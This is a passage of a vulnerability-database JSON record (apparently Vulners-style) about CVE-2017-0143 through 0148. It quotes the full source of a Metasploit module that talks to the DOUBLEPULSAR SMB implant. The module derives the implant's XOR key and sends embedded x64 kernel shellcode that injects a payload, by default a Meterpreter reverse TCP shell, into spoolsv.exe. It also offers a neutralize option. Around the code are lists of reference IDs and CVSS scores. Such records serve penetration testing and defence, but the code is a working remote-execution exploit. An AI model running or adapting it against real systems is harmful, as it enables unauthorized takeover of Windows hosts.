"PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "rapid7community", 
"idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27803", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33895"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:43970"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700059.PRM", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96704", "SMNTC-96709", "SMNTC-96703", "SMNTC-96705", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", 
"idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-07T06:18:11", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-09-07T06:18:11", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: 
https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => 
true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-07] #"}, "lastseen": "2021-09-07T06:18:11", "differentElements": ["sourceData"], "edition": 9}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "9e4ea3d15dcf81f3ffd018c1f9412e52", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-07T22:13:58", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "f5", "idList": 
["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27803"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "exploitdb", "idList": ["EDB-ID:42031", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96707", "SMNTC-96705", "SMNTC-96706", "SMNTC-96703", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", 
